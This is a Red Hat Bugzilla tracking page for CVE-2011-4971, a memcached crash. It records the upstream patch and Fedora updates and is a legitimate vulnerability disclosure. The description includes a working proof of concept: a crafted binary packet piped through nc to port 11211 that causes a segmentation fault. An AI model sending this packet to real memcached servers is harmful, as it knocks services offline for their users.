Bug 957964 (CVE-2011-4971) - CVE-2011-4971 memcached: specially crafted packet segmentation fault
Summary: CVE-2011-4971 memcached: specially crafted packet segmentation fault
Keywords:
Status: CLOSED WONTFIX
Alias: CVE-2011-4971
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 957966 957967 957969 957970 988739
Blocks: 957971
TreeView+ depends on / blocked
 
Reported: 2013-04-30 02:07 UTC by Kurt Seifried
Modified: 2021-06-11 21:05 UTC (History)
8 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2021-06-11 21:05:04 UTC
Embargoed:


Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Novell 817781 0 None None None 2019-05-31 20:34:51 UTC

Description Kurt Seifried 2013-04-30 02:07:56 UTC
This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:

$ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it: 

$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has 
changed significantly since then.

External References:

https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872

Comment 1 Kurt Seifried 2013-04-30 02:09:53 UTC
Created memcached tracking bugs for this issue

Affects: fedora-all [bug 957966]

Comment 2 Kurt Seifried 2013-04-30 02:10:27 UTC
Created memcached tracking bugs for this issue

Affects: epel-5 [bug 957967]

Comment 3 Kurt Seifried 2013-04-30 02:12:22 UTC
Created memcached tracking bugs for this issue

Affects: epel-6 [bug 957969]

Comment 6 Huzaifa S. Sidhpurwala 2013-06-18 09:31:39 UTC
Proposed upstream patch (with a test):

https://code.google.com/p/memcached/issues/detail?id=192#c19

Comment 11 Miroslav Lichvar 2013-12-12 13:43:40 UTC
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks!

https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424

Comment 12 Fedora Update System 2014-02-03 02:42:28 UTC
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 13 Fedora Update System 2014-02-03 02:49:02 UTC
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 20 Product Security DevOps Team 2021-06-11 21:05:04 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2011-4971


Note You need to log in before you can comment on or make changes to this bug.